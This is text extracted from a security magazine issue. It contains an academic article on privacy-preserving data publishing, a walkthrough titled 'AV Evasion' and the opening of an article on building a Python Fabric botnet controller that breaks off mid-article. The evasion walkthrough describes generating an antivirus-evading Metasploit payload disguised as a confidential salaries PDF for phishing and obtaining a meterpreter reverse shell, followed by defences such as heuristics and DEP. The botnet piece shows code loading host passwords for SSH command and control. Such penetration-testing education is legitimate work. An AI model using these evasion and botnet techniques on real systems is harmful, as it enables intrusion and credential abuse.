the best way to ensure that this balance is maintained into the future and that the intentions of the
authors are truly realized in implementation.

Lance Cleghorn

Lance Cleghorn, a North Carolina native, received a Bachelor of Science

degree in Information Technology
from East Carolina University. Graduating Summa Cum Laude Lance completed his undergraduate degree in
2012. As an undergraduate student
Lance concentrated in Cisco networking technology. He was awarded a
Master of Science in Information Security from East
Carolina University in 2013, and has been published in
PenTest Magazine and the Journal of Information Security. Lance holds several major
industry certifications including the Associate of ISC2 towards a CISSP, CCNP, CompTIA
Security+, EMCISA, and MCP.

Page 14

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Data Publishing
Privacy-Preserving Data Publishing (PPDP) is concerned mainly
with the feasibility of anonymizing and publishing personspecic data for data mining without compromising the privacy of

ata collection and publishing are ubiquitous in todays world. Many organizations
such as governmental agencies, hospitals, and nancial companies collect and disseminate various person-specic data for research
and business purposes. Worldwide governments
systematically collect personal information about
their citizens through censuses. These data are
released to public for demographic research. In
the medical domain, gaining access to high-quality healthcare data is a vital requirement to informed decision-making for medical practitioners
and researchers. Grocery stores collect a large
amount of customer purchase data via store courtesy cards. These data are analyzed to model
customer behaviour and are used by advertisement companies. In the online world, web sites
and service providers (Google for example) collect search requests of users for future analysis.
Recent data publishing by AOL is a unique example of this kind [3]. Finally, the emergence of
new technologies such as RFID tags, GPS-based
devices, and smartphones raises new privacy
concerns. These devices are used extensively in
many network systems including mass transportation, car navigation, and healthcare management. The collected trajectory data captures the
detailed movement information of the tagged ob05/2013 (24) August

jects, offering tremendous opportunities for mining useful knowledge. However, this trajectory
data contains peoples visited locations and thus
reveals identiable sensitive information such as
social customs, religious inclination, and sexual
preferences. Thus, data about individuals gets
collected at various places in various ways.
This data offers tremendous opportunities for
mining useful information, but also threatens personal privacy. Data mining is the process of extracting useful, interesting, and previously unknown information from large datasets. Due to
the rapid advance in the storing, processing, and
networking capabilities of the computing devices;
the collected data can now be easily analyzed to
infer valuable information for research and business purposes. Data from different sources can be
integrated and further analyzed to gain better insights. The success of data mining relies on the
availability of high quality data and effective information sharing. Since data mining is often a key
component of many systems of business information, national security, and monitoring and surveillance; the public has acquired a negative impression of data mining as a technique that intrudes on
personal privacy. This lack of trust has become an
obstacle to the sharing of personal information for
the advancement of the technology.

Page 16

Real-Life Examples

The current practice in data sharing primarily relies on policies and guidelines on the types of data that can be shared and agreements on the use
of shared data. This approach alone may lead to
excessive data distortion or insufcient protection.
For example, the most common practice is to remove the identiable attributes (such as name,
social security number) of individuals before releasing the data. This simple technique though apparently looks innocuous, in reality fails to protect
the privacy of record holders. Also, contracts and
agreements cannot prevent an insider from intentionally performing privacy attacks or even stealing data. In this section, we present a number of
real-world attacks to emphasize the need of privacy-preserving techniques and to illustrate the challenges in developing such tools.
The most illustrious privacy attack was demonstrated by Sweeney [8]. In Massachusetts, Group
Insurance Commission (GIC) collected the medical data of the state employees. The data set had
no identiable attributes such as name, social security number or phone numbers and thus was
believed to be anonymous. GIC gave a copy of
the data to researchers and sold a copy to industry. However, the data set did contain demographic information such as date of birth, gender, and
ZIP code. Sweeney reported that 87% of the U.S.
population can be uniquely identied based on
5-digit zip code, gender and date of birth. It is not
common to nd many people with the same date
of birth, less likely for them to live in the same
place and very less likely having same gender.
She bought a copy of the Massachusetts voter
registration list for $20 and identied the record
of William Weld, governor of the state of Massachusetts, by joining both the tables. This kind of
attack where external data can be used to identify
an anonymous data is called linking attack. The
concern of linking attacks has escalated in recent

years due to the ease of collecting external information over the Internet.
Not all linking attacks require external information. Sometimes the semantic information of the
data itself reveals the identity of a user. The case
of the AOL data release is a notable example. On
August 6, 2006, AOL released a 2GB le containing the search queries of its 650,000 users. There
are approximately 20 million search queries collected over a three month period. As a privacy protection mechanism, AOL removed all user identities except for the search queries and assigned a
random number to each of its users. Three days
later, two New York Times reporters identied and
interviewed the user #4417749 from the release
data [3]. Ms. Thelma Arnold was re-identied from
the semantic information of her search queries.
She said, We all have a right to privacy. Nobody
should have found this all out.
Netix, a movie renting service, announced a
$1,000,000 prize for 10% improvement for their
recommendation system. To assist the competition, they also provided a real data set which contains 100 million ratings for 18,000 movie titles from
480,000 randomly chosen users. According to the
Netix website, To protect customer privacy, all
personal information identifying individual customers has been removed and all customer ids have
been replaced by randomly assigned ids. Narayanan and Shmatikov shortly attacked the Netix
data by linking information from the International
Movie Database (IMDb) site, where users post
their reviews (not anonymous) [7]. They showed
With 8 movie ratings (of which 2 may be completely wrong) and dates that may have a 14-day error,
99% of records can be uniquely identied in the
data set. For 68%, two ratings and dates (with a
3-day error) are sufcient.
It is evident from the above examples that mere
removal of the personal information does not ensure privacy to the users. To overcome this ob-

Figure 1. Data ow in privacy-preserving data publishing

05/2013 (24) August

Page 17

stacle, the research on Privacy-Preserving Data
Publishing (PPDP) is concerned mainly with the
feasibility of anonymizing and publishing personspecic data for data mining without compromising
the privacy of individuals. The research is also concerned with designing a unied framework of algorithms for anonymizing large data sets in various
real-life data publishing scenarios. In the following
section, we elaborate on the different phases of
privacy-preserving data publishing and discuss different real-life data publishing scenarios.

Privacy-Preserving Data Publishing


Privacy-preserving data publishing (PPDP) has

two phases: data collection and data publishing.
Figure 1 depicts the data ow in PPDP. In the data
collection phase, the data publisher collects data
from the individuals. In the data publishing phase,
the data publisher releases the collected data to
the data recipients, who will then conduct data
mining on the published data. For example, a hospital collects data from patients and publishes the
patient records to an external medical center. In
this example, the hospital is the data publisher, patients are the individuals (data owners), and the
medical center is the data recipient. The recipient
could be a data user (researcher) who wants to
perform legitimate data analysis, or could potentially be an adversary who attempts to associate
sensitive information in the published data with a
target victim. For example, the data recipient, say
the external medical center, is a trustworthy entity;
however, it is difcult to guarantee that all staff in
the company are trustworthy as well.
There are two models in the data collection
phase: trusted and untrusted. In the trusted model,
individuals trust the data publisher and give all the
required data. For example, patients give their true
information to hospitals to receive proper treatment.
In this scenario, it is the responsibility of the data
publisher to protect privacy of the individuals personal data. In the untrusted model, individuals (data
owner) do not trust their data publisher and sometimes the data publisher may be the data recipient.
A typical example of this model is participants responding to a survey. Various cryptographic solutions, anonymous communications, and statistical
methods were proposed to collect records anonymously from individuals revealing their identity. In
this article, we focus on the trusted model and study
how to anonymize data in the data publishing phase
to protect privacy of the individuals.
05/2013 (24) August

There are two models in the data publishing

phase: interactive and non-interactive. In the interactive model, the data recipients pose aggregate
queries through a private mechanism and the data publisher answers these queries in response.
These aggregate values are computed over a set of
records and should not disclose any sensitive value of an individual. However, it is possible3 for a
recipient to construct a set of queries that unveils
the detailed underlying data [1]. The challenge is to
answer the queries in such a way that no inference
can be made based on the aggregate statistics. The
data publisher determines whether the answer can
or cannot be safely delivered without inference and
thus controls the amount of information to be released. In the noninteractive model, the data publisher rst anonymizes the raw data and then releases the anonymized version for data analysis.
Once the data are published, the data publisher
has no further control of the published data. Therefore, the data publisher needs to transform the underlying raw data into a version that is immunized
against privacy attacks but which still supports effective data mining tasks. While both the interactive
and non interactive models are useful, the data recipients usually prefer to get an anonymous data
set as the data can be directly analyzed by the offthe-shelf data analysis software (such as SPSS).
The data publisher may or may not have the
knowledge of the data mining to be performed on
the released data. In some scenarios, the data
publisher does not even know who the recipients
are at the time of publication, or has no interest in
data mining. For example, the hospitals in California publish patient records on the Web. The hospitals do not know who the recipients are or how the
recipients will use the data. The hospital publishes
patient records because it is required by regulations [4]. Therefore, it is not reasonable to expect
the data publisher to do more than anonymize the
data for publication in such a scenario. In other
scenarios, the data publisher is interested in the
data mining result but lacks the in-house expertise
to conduct the analysis, and hence outsources the
data mining activities to some external data miners. In this case, the data mining task performed
by the recipient is known in advance. In the effort
to improve the quality of the data mining result, the
data publisher could release a customized data set
that preserves specic types of patterns for such a
data mining task. Still, the actual data mining activities are performed by the data recipient, not by
the data publisher. To achieve proper balance be-

Page 18

tween privacy and utility, the data publisher needs

to decide three components: privacy model, anonymization techniques, and utility metric.

Privacy Models

The collected data set are stored in a data table

where each row represents an individual and each
column is an attribute. We use the terms data set
and data table interchangeably in the rest of this
article. Attributes can be divided into three categories. (1) Attributes that explicitly identify an individual, such as SSN, and name. These attributes
are called explicit identier and must be removed
before releasing the data. (2) A set of attributes
whose combined value may potentially identify
an individual. For example, the combined values
of zip code, date of birth, and gender. These attributes are called quasi-identier (QID) and the values of these attributes may be publicly accessible
from other sources. Finally, an attribute is considered sensitive if an adversary is not permitted to
link its value with an identifer. Examples include:
disease, salary, etc.
Different privacy models have been proposed
to prevent an adversary from linking an individual with a sensitive attribute given the knowledge
of the quasi-identifer. Following, we briey present
some of the wellknown privacy models.
Table 1 (a). Patient table









Table 1 (b). 2-anonymous patient table




















k-Anonymity. Removing explicit identiers is not

enough to protect privacy of the individuals. If a record in the table is so specic that not many individuals match it, releasing the data may lead to linking
05/2013 (24) August

the individuals record and, therefore, the value of

her sensitive attribute. Consider the raw patient data in Table 1(a), where each record represents a patient with the patient-specic information. Job, Sex,
and Age are quasi-identifying attributes. Suppose
that the adversary knows that the target patient is
a Lawyer and his age is 38. Hence, record #3, together with his sensitive value (HIV in this case),
can be identied since he is the only Lawyer who is
38 years old in the data. k-anonymity requires that
no individual should be uniquely identiable from a
group of size smaller than k based on the values of
QID attributes. A table satisfying this requirement is
called a k-anonymous table. Table 1(b) is a 2-anonymous table of Table 1(a).
k-anonymity only prevents identity linkage attacks
since an adversary can not identify a record corresponding to an individual with condence greater
than 1/k. However, k-anonymous data table is vulnerable against attribute linkage attacks. Suppose
the adversary knows that the patient is a dancer of
age 30. In such case, even though two such records
exist (#6 and #7), the adversary can infer that the patient has HIV with 100% condence since both the
records contain HIV. To prevent such attribute linkage attack, -diversity requires that every QID group
should contain at least well-represented values for
the sensitive attribute. There are a number of interpretations of the term well-represented. The simplest denition requires every equivalent group to
have distinct values of the sensitive attribute.
Condence Bounding
The condence of inferring a sensitive value from
different combination of QID values are bounded
by specifying one or more privacy templates of the
form, QID s, h, where s is a sensitive value, QID
is a quasi-identier, and h is a threshold. For example, with QID = {Job, Sex,Age}, QID HIV, 50%
states that the condence of inferring HIV from any
group on QID is no more than 50%. For the data in
Table 1(b), this privacy template is violated because
the condence of inferring HIV is 100% in the group
for {Dancer, *, 30}. Unlike -diversity, condence
bounding can have different privacy templates with
different condence thresholds.
There are other privacy models [6]. (, k)-anonymity
requires every QID group to satisfy both k-anonymity
and condence bounding. t-closeness requires the
distribution of a sensitive attribute in any group to be
close to the distribution of the attribute in the over-

Page 19

all table. The notion of personalized privacy allows
each record owner to specify her own privacy level. This model assumes that a sensitive attribute has
a taxonomy tree and each record owner species a
guarding node in the taxonomy tree. All of these models, which are known partition-based privacy models,
partition the data table in to groups and provide different guarantees about the anonymized data based
on the assumption of the adversarys background
knowledge. Recent research works show that the algorithms that satisfy partition-based privacy models
are vulnerable to various privacy attacks and do not
provide the claimed privacy guarantee.
Differential privacy has received considerable attention as a substitute for partition-based privacy
modelsin privacy-preserving data publishing. Differential privacy provides strong privacy guarantees
independent of an adversarys background knowledge, computational power or subsequent behavior. Partition-based privacy models ensure privacy
by imposing syntactic constraints on the output.
For example, the output is required to be indistinguishable among k records, or the sensitive value
to be well represented in every equivalence group.
Instead, differential privacy guarantees that an adversary learns nothing more about an individual, regardless of whether her record is present or absent
in the data. Informally, a differentially private output
is insensitive to any particular record. Thus, if a user had opted in the database, there would not be a
signicant change in any computation based on the
database. Therefore, this assures every individual
that any privacy breach will not be a result of participating in a database. Following we present the
formal denition of the differential privacy model. A
general overview of on differential privacy can be
found in the recent survey [5].
Differential Privacy
A randomized algorithm Ag is differentially private if
for all data sets D and D where their symmetric difference contains at most one record (that is, |DD|
1), and for all possible anonymized data sets ,

Pr[Ag(D) = ] e Pr[Ag(D) = ], (1)

where the probabilities are over the randomness of the Ag. The parameter > 0 is public and
specied by a data publisher. Lower values of
provide a stronger privacy guarantee.
Differential privacy is a strong privacy denition,
but this is not a perfect denition. If the records
are not independent or an adversary has access
to aggregate level background knowledge about
the data then privacy attack is possible. Dening
an appropriate privacy definition for a particular
application scenario is currently an active area
of research.

Anonymization Techniques

Given a privacy model, different anonymization

techniques are used to transform the original data set into a version that satises the privacy requirements. Anonymization techniques are used to
make the data less precise to protect privacy. Following, we present some common techniques that
are often used for anonymization.
The simplest technique to achieve anonymity is to
suppress the value of a cell. Suppression is done
by replacing an attribute value with a special symbol * or Any. It has been widely used to satisfy
privacy requirement such as k-anonymity. For example in Table 1(b), the values of Sex attribute
of records #6 and #7 are suppressed to ensure
Table 2 (a). Bucketized data: QID Attribute




Engineer Male 35 1
Engineer Male 38 2
Lawyer Male 38 1
Writer Female 30 3
Writer Female 33 2
Dancer Male 30 3
Dancer Female 30 3




Figure 2. Taxonomy trees for Job, Sex, Age

05/2013 (24) August

Page 20

truthfulness at the record level. This technique is

often used in the untrusted data collection model.
This technique can also ensure differential privacy,
though it requires a higher degree of noise than
an output perturbation-based approach, which we
explain next.

Table 2 (b). Bucketized data: Sensitive Attribute





Generalization provides better data utility compared
to suppression by replacing the specic value with
a more general value. While suppression works in
a binary fashion (keep the original value or suppress), generalization has a number of intermediate states according to a taxonomy tree for each attribute. Figure 2 depicts the taxonomy trees for the
attributes Job, Sex and Age. For example in Table
1(b), the values Engineer and Lawyer are replaced
by a more general value Professional according to
the taxonomy tree. Generalization techniques can
be classied mainly into two categories: global vs.
local. In global generalization, all instances of a value are mapped to the same general value. While in
local generalization, different instances can be generalized to different general values. A range of algorithms have been proposed that use generalization
technique to enforce different privacy models [6].
Unlike generalization and suppression, bucketization does not modify the QID and the sensitive
attribute (SA), but de-associates the relationship
between the two. However, it thus also disguises
the correlation between SA and other attributes;
therefore, hinders data analysis that depends on
such correlation. Bucketization was proposed to
achieve -diversity. It divides all the records into
different buckets in such a way that each bucket
contains distinct values of sensitive attribute. Tables 2(a) and 2(b) are the bucketized data, which
satises 2-diversity for the patient data Table 1(a).
Input Perturbation
This approach modies the underling data randomly by either adding noise to the numerical values or
replacing the categorical values with other values
from the domain [2]. The input-perturbated data
are useful at the aggregated level (such as average or sum), but not at the record level. Data recipients can no longer interpret the semantic of each
individual record. Yet, this is a useful technique
if the applications do not require preserving data
05/2013 (24) August

Output Perturbation
This approach rst computes the correct result and
outputs a perturbed version of the result by adding
noise. This technique is often used to achieve differential privacy. For example, the Laplace mechanism, which is a output perturbation-based approach, takes as inputs a data set D, a function f,
and the privacy parameter . The privacy parameter determines the magnitude of noise added to
the output. The mechanism rst computes the true
output f(D), and then returns the perturbated answer f() = f(D) + Lap(), where Lap() is a random
variable sampled
from a Laplace distribution with
variance 2 and mean 0.

Utility Metrics

While protecting privacy is a critical element in data publishing, it is equally important to preserve
the utility of the published data because this is the
primary reason for publication. A number of utility metrics have been proposed to quantify the information that is present in the anonymized data.
Data publishers use these metrics to evaluate and
optimize the data utility of the anonymized data. In
general, utility metrics can be classied into two
categories: general purpose metric and special
purpose metric.
General Purpose Metric
In many cases, the data publisher does not know
how the released data will be used by the data recipient. In such cases, the data publisher uses the
general purpose metric that measures the similarity between the original data and the anonymized
data. The objective is to minimize the distortion in
the anonymized data. The simplest and most intuitive measure is to count the number of anonymization operations performed on the data set.
For example, in the case of suppression, the data
utility is measured by counting the number of suppressed values. Less suppression means more
utility. Similarly, for generalization, the information
loss is measured by the number of generalization
steps performed. Other metrics include Loss Metric (LM), Normalized Certainty Penalty (NCP), Discernibility Metric (DM), etc.

Page 21


[1] N. R. Adam and J. C. Wortman. Security control methods for statistical databases. ACM Computer Surveys,
21(4):515556, 1989.
[2] R. Agrawal and R. Srikant. Privacy preserving data mining. In Proceedings of the ACM SIGMOD International Conference on Management of Data (SIGMOD), pages 439450, 2000.
[3] M. Barbaro and T. Zeller. A face is exposed for AOL searcher no. 4417749. New York Times, August 9, 2006.
[4] D. M. Carlisle, M. L. Rodrian, and C. L. Diamond. California inpatient data reporting manual, medical information
reporting for california, 5th edition. Technical report, Ofce of Statewide Health Planning and Development, July 2007.
[5] C. Dwork. A rm foundation for private data analysis. Commun. ACM, 54(1):8695, 2011.
[6] B. C. M. Fung, K. Wang, R. Chen, and P. S. Yu. Privacy-preserving data publishing: A survey of recent developments.
ACMComputing Surveys, 42(4):153, June 2010.
[7] A. Narayanan and V. Shmatikov. Robust de-anonymization of large sparse datasets. In Proceedings of the IEEE
Symposium on Security and Privacy (S&P), pages 111125, 2008.
[8] L. Sweeney. k-anonymity: A model for protecting privacy. In International Journal on Uncertainty, Fuzziness and
Knowledge-based Systems, volume 10, pages 557570, 2002.

Special Purpose Metric

The type of information that should be preserved
depends on the data mining task to be conducted
on the published data. If the purpose of the data publishing is known before the data release,
then customized anonymization techniques can
be adapted to preserve certain information that
is useful for that particular task. Optimizing data
utility with respect togeneral purpose metrics (LM,
DM, etc.) does not preserve enough information for
a particular data mining task such as classication
analysis. In such a scenario, the target data mining
model is rst built on the anonymized data to compare the accuracy of the model with respect to the
model built from the original data.


Privacy-preserving data publishing is an exciting research area. This article presents different technical
proposals to the demand of simultaneous information sharing and privacy protection. However, the
problems of6 data privacy can not be fully solved only by technology. We believe that there is an urgent
need to bridge the gap between advanced privacy
preservation technology and current policies. In the
future, we expect that social and legal regulations
will complement the best practices of privacy-preserving technology. To this end, it is also important
to standardize some privacy models and algorithms
for different applications as it is unlikely that there exists a one-size-t solution for all application scenarios. Thus, the future research direction appears to lie
in dening suitable privacy models, and in developing trustworthy algorithms and systems that provide
performance guarantees ensuring the security and
privacy of data for specic applications.
05/2013 (24) August

Noman Mohammed

Noman Mohammed is a postdoctoral fellow in the

School of Computer Science at McGill University. Hisresearch interests include privacy and applied cryptography; in particular, private data sharing, secure distributed computing, and secure database management. Previously, he completed his Ph. D. in Computer Science
and M.A.Sc. in Information Systems Security at Concordia University. He has received several prestigious
awards including the Best Student Paper Award in ACM
SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD 2009), and the Alexander
Graham Bell Canada Graduate Scholarship (CGS) from
the Natural Sciences and Engineering Research Council
of Canada (NSERC).


Benjamin C. M. Fung is an Associate Professor in the

Concordia Institute for Information Systems Engineering (CIISE) at Concordia University in Canada, and a research scientist of the National Cyber-Forensics and
Training Alliance Canada (NCFTA Canada). He received
a Ph.D. degree in computing science from Simon Fraser
University in 2007. He has over 60 refereed publications
that span across the prestigious research forums of data mining, privacy protection, cyber forensics, web services, and building engineering. His data mining work in
authorship analysis has been widely reported by media
worldwide. His research has been supported in part by
the Discovery Grants and Strategic Project Grants from
the Natural Sciences and Engineering Research Council
of Canada (NSERC), Defence Research and Development
Canada (DRDC), and Le Fonds qubcois de la recherche
sur la nature et les technologies (FQRNT), and NCFTA
Canada. Dr. Fung is a licensed professional engineer in
software engineering.

Page 22


AV Evasion:
Bypassing AV Products and Protection Against It
AV evading techniques are getting better and smarter by the
day, and having just an Anti-Virus and Anti-Spyware application
is insufficient to protect our machines from additional angles of

s more and more threats emerged, so do the

Antivirus product vendors, who are consistently trying to keep up with the emerging
threats, virus signatures, variants, and behaviors. It
has always been a topic of interest to hackers/pentesters everywhere the ways to bypass security
products, from firewalls, Anti-Virus, Anti-Spyware,
Intrusion Detection System, etc. One of the most
common technique attackers try to evade is the Anti-Virus application, as this feature will most likely be
responsible for stopping the malware, viruses, and
malicious executables from executing on the victims machine. Thus, resorting the attackers to find
new ways and processes to evade the application.

as an open source by NCC Groups Plc. Its features include:


#git clone

The purpose of this article is to provide an end to

end and step by step approach on the process of
creating an executable that is able to evade AV
detection and how it can be executed to provide
a meterpreter session to the attacker. This article
also describes the ways to prevent such attack/
threat from the perspective of product vendors and
Windows security settings itself.

Generating Metasploit executable payload to

bypass AV detection,
Generating a Local or Remote Listener,
Disguising the executable file with a PDF icon,
Execution of executables are minimized on the
victims computer,
Automatically creates AutoRun files for CDROM exploitation.
To install metaploitavevasion, fire up BackTrack or
Kali and run the command (see Figure 1):

Figure 1. Installing metasploitavevasion

Before We Begin

Metasploit AV Evasion is a payload generator that

avoids most Anti-Virus products. It was released
05/2013 (24) August

Figure 2. Start the metasploitavevasion by running the #./

Page 24

Providing Access to

#chmod a+x

Creating the Executable

To execute it, go to the metasploitavevasion directory and run the command (see Figure 2):

Select local or remote system. If you select local, it

will auto grab your local IP address and use that. If
you select alternative, it will ask you which IP address to listen on, then give you the msf listener
code to run at the end (see Figure 3). In this case
I used port 443 (see Figure 4). There are five options for the payload. The stealthier you choose, the
bigger the file is and the more random data it creates with the intention to reduce the detection ratio.
In this case, I have chosen option 5, which is Desperate Stealth (see Figure 5), and it generated an
executable with the size of 135 MB. It will then output an executable called salaries.exe in the /root/
metasplotavevasion/ directory (see Figure 6). You
can copy this to your CD or Thumbdrive and use a
phishing/social engineering techniques to take advantage of the curiosity of the systems owner to

run it. To make it more interesting, I renamed the

file Employees Salaries-Confidential.pdf, and by
default Windows 7 and Windows Server machines
hide the extension of the files. And with the pdf icon
embedded to it, it is more believable (see Figure 7).

Testing Against Symantec AV and McAfee AV

To test my newly created executable, I used
McAfee and Symantec Endpoint Protection AntiVirus and Anti-Spyware feature to see whether it
gets detected (see Figure 8).
Note: Both used products have the Anti-Virus
and Anti-Spyware feature only.
Test Case 1: Scanned against McAfee
Result: Undetected
Test Case 2: Scanned against Symantec Endpoint Protection (see Figure 9)
Result: Undetected
Note: The date of this article being written was
14th July 2013.

Starting the Payload Handler and Listener

We will then run msfconsole and start the listener

on a dedicated attacking system (see Figure 11).

Figure 6. Executable created

Figure 3. Entering the IP of the listener

Figure 7. Changing the name of the executable to something


Figure 8. Scanning the file against McAfee AV

Figure 4. Choosing what port to be used to listen on

Figure 5. The more stealth you want, the bigger the size of
the file
05/2013 (24) August

Figure 9. Scanning the file against Symantec AV

Page 25

In this scenario, we are using the following specifications for the victims machine:
Windows Server 2008 SP2 (64bit) and Windows 7 Enterprise SP1 (64bit),
Data Execution Prevention settings is set to
Turn on DEP for essential Windows Programs
and Services only,
Symantec Endpoint Protection v11.x Antivirus
and Anti Spyware Protection only.

Execution of Employees

Both machines, when the Employees Salaries-Confidential.pdf was executed, allowed us to get a meterpreter session (see Figure 12) despite having an
updated definition of Symantec Endpoint Protection.

Prevention (I)

To prevent such an attack, additional features from

product vendors do come in handy. In this case,
Symantec Endpoint Protection comes with features like Proactive Threat Protection and Network
Threat Protection.

and AntiSpyware scans rely mostly on signatures

to detect known threats. Proactive threat scans use
heuristics to detect unknown threats. The Heuristic
process scan analyzes the behavior of an application or a process. The scan determines if the process exhibits the characteristics of a threat, such as
Trojan horses, worms, or key loggers. The processes typically exhibit a type of behavior that a threat
can exploit, such as opening a port on a users computer. This type of protection is sometimes referred
to as protection from Zero-day attacks.

Testing the Employees Salaries-Confidential.

pdf on the System with Proactive Threat Protection and Network Threat Protection Enabled
As soon as we launched the Employees Salaries-Confidential.pdf, Symantec Endpoint Protection was automatically able to detect and block the

Symantecs Proactive Threat Protection

Proactive threat scanning provides an additional

level of protection to a computer that complements
existing AntiVirus, AntiSpyware, Intrusion Prevention, and Firewall protection technologies. AntiVirus

Figure 13. Symantec Endpoint Protection client with

additional features

Figure 10. The version of the Symantec Endpoint Protection

client used

Figure 14. Symantecs IPS in action

Figure 11. Starting the Payload Handler

Figure 12. A Meterpreter session

05/2013 (24) August

Figure 15. The security log of Symantec Endpoint Protection

Page 26

attack and classify the attack as a Meterpreter Reverse TCP attack (see Figure 14).
In the Security Log (see Figure 15), it is able to
log the event, the type of attack, where the attack
originated from, and the full path of the executable.


DEP (Data Execution Prevention): http://windows.
Symantecs Proactive Threat Protection: http://
Symantec Endpoint Protection:
McAfee Anti-Virus:
Metasploit AV Evasion:
Metsploit Payload Generator Script: http://www.
BackTrack Linux:
Kali Linux:

Prevention (II)

In the previous test, the DEP (Data Execution

Prevention) (see Figure 16) setting was set to
Turn on DEP for essential Windows programs and
services only.
In this test, we are going to set the setting to:
Turn on DEP for all programs and services except
those I select.
When the Employees Salaries-Confidential.pdf
was executed, DEP responded by closing the executable from executing thus protecting the system
from providing a meterpreter session to the attacker (see Figure 17).

What is DEP?

Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful
programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and
other authorized programs. These types of attacks
can harm your programs and files.
DEP can help protect your computer
by monitoring your
programs to make
sure that they use
safely. If DEP notices a program on
your computer using memory incorrectly, it closes the
program and notifies you.
Figure 16. Data Execution
Prevention Option

Figure 17. DEP in action

05/2013 (24) August


AV evading techniques are getting better and

smarter by the day and as shown in the above
tests, having just an Anti-Virus and Anti-Spyware
application is insufficient to protect our machines
from additional angles of threats. To defend from
such attacks, product vendors have since made
their applications to come with several other features, such as IPS (Intrusion Prevention System), IDS (Intrusion Detection System), Firewall,
and NAC (Network Access Control). These features will perform additional levels of security and
protection to handle more advanced and newer
threats and attacks that traditional Anti-Virus and
Anti-Spywares feature could not.


Graduated with a BSc Degree in Cyber

Forensics, Information Security Management and Business Information Systems, Fadli is a security professional at
BT Global Services, a company that offers specialized IT security services to
customers worldwide. He has over 7 years experience in the
IT industry dealing with operations, support, engineering,
consulting, and currently an ethical hacker performing vulnerability assessment and penetration testing services for
domains such as Network Assessments, Wireless Assessments, Social Engineering, Perimeter Device Assessment,
and Web App Assessments through Open Source and commercial tools based on methodologies from OWASP and
OSSTMM. Fadli has also conducted trainings and speaking
at seminars on the topics of information security to both
the private and government sectors. In his free time, Fadli conducts security research and regularly updates his blog
focusing on IT security @

Page 27


Phantoms Cerebrum
Using Python to Work a Botnet
Imagine a ghost robot in every computer, working in the shadows,
lets call it the Phantom, performing tasks for its master. The master
controls the ghosts through a master brain device, lets call it the
cerebrum, much like the device Prof Xavier had in the X-Men. That
device could control the minds of mutants all over the world. In
my case, the cerebrum controls the phantoms in each computer of
my home and workplace.

he idea is to manage a network of computers in your workplace to help you perform

similar tasks simultaneously (for example,
installing new antivirus or deploying a new version
of Windows). The applications are limitless. That
being said, this could be exploited for malicious
tasks to control infected hosts as well. You can call
your phantoms as bots or as computers with your
agents or infected hosts. It completely depends on
your point of view.
I plan to show how attackers could use network
management products intended for use by sys admins in ways they werent intended to be used. I
will show how to create phantoms but before I do
that, I will work on the Cerebrum.


My favorite language for designing and running my

own tools is Python because its a hackers language. With its decreased complexity, increased
efficiency, limitless third party libraries, and low
bar to entry, Python provides an excellent development platform to build your own offensive tools. If
you are running Mac OS X or Linux, odds are it is
already installed on your system. While a wealth
of offensive tools exists, learning python can help
you with the difficult cases where the tools fail. Especially in cases where you dont want your attack
05/2013 (24) August

signature verified. For example, using Acunetix

when you try sql injections, it leaves a set pattern
of entries on the target system. Any defensive tool
can use this to block you. What will you do then?
System administrators often need to perform the
same (or similar) tasks across a multitude of hosts.
Doing this manually is unreasonable, so solutions
have been created to help automate the process.
While these solutions can be a lifesaver to many,
lets look at them in a different light. In this post,
well explore how easy it would be for an attacker
to use one of these solutions, a popular Python library called Fabric, to quickly create a command
and control (C&C) application that can manage a
multitude of infected hosts over SSH.
Disclaimer: Compromising hosts to create a botnet without authorization is illegal, and not encouraged in any way. Therefore, the content is meant
for educational purposes only.

Setting Up Your Development


The Python download site (

download/) provides a repository of Python installers for Windows, Mac OS X, and Linux Operating
Systems. If you are running Mac OS X or Linux,
odds are the Python interpreter is already installed
on your system. Downloading an installer provides

Page 28

a programmer with the Python interpreter, the standard library, and several builtin modules. The Python standard library and builtin modules provide
an extensive range of capabilities, including built
in data types, exception handling, numeric and
math modules, file handling capabilities, cryptographic services, interoperability with the operating system, Internet data handling, and interaction
with IP protocols, among many other useful modules. However, a programmer can easily install
any third party packages. A comprehensive list
of third party packages is available at http://pypi.
If you are not comfortable with Python or havent
used it before, I highly recommend this http://

Fabric Basics

Fabrics Documentation describes it as a library

and command line tool for streamlining the use
of SSH for application deployment or systems administration tasks. Using the popular Paramiko
Python library to manage its SSH connections,
Fabric provides programmers with an easy to
use API to run sequential or parallel tasks across
many machines. Before building a C&C application, lets explore some of the basics of Fabric (a
full tutorial can be found here).

The fab command line tool

While we wont be using it much in this post, I dont

feel a post about Fabric would be complete without mentioning the fab tool. Usually, sysadmins only
need to setup predefined commands (called tasks)
to be run on multiple hosts. With this being the case,
the standard application of Fabric is as follows:

Create a fabfile

Use the fab tool to execute tasks defined in the

fabfile on selected hosts.
While this allows us to run a predefined set of
commands, this isnt helpful if we want an interactive framework. The solution to this is found in the
Fabric documentation:
The fab tool simply imports your fabfile and executes the function or functions you instruct it to.
Theres nothing magic about it anything you can
do in a normal Python script can be done in a fabfile!
This means that we can execute any task in our
fabfile without needing to go through the fab command line tool. This is helpful, since we can create
an interactive management wrapper to perform tasks
on a dynamic list of hosts as we choose. But first, we
need to address the obvious: what is a fabfile?


In a nutshell, a fabfile is simply a file containing

functions and commands that incorporate Fabrics
API. These functions can be found in the fabric.
api namespace. Its important to remember our
note above which says that a fabfile is just Python
nothing special.


Fabric is best installed via pip (highly recommended)

or easy_install (older, but still works fine), such as:
$ pip install fabric

You may also opt to use your operating systems

package manager; the package is typically called
fabric or python fabric, such as:
$ sudo apt-get install fabric

Advanced users wanting to install a development version may use pip to grab the latest master branch (as well as the dev version of the
Paramiko dependency):
Figure 1. Phantoms and its Cerebrum
05/2013 (24) August

$ pip install paramiko==dev

$ pip install fabric==dev
Page 29

Or, to install an editable version for debugging/
hacking, execute pip install e. (or python setup.
py install) inside a downloaded or cloned copy of
the source code.

ActivePython and PyPM

a mapping between host strings and passwords to

be used. This prevents us from having to enter the
passwords upon each new connection. Lets read
all the hosts and passwords from the credentials file
and put them into the variables: (

Windows users who already have ActiveStates

ActivePython distribution installed may find Fabric
is best installed with its package manager, PyPM.
Below is example output from an installation of
Fabric via pypm: Listing 1.
So, with that brief intro, lets dive into the Fabric
API to see how we can use the provided functions
to build an SSH C&C:

for line in open(creds.txt,r).readlines():

host, passw = line.split()
env.passwords[host] = passw

Building the C&C

run(command) run a shell command on a remote host,

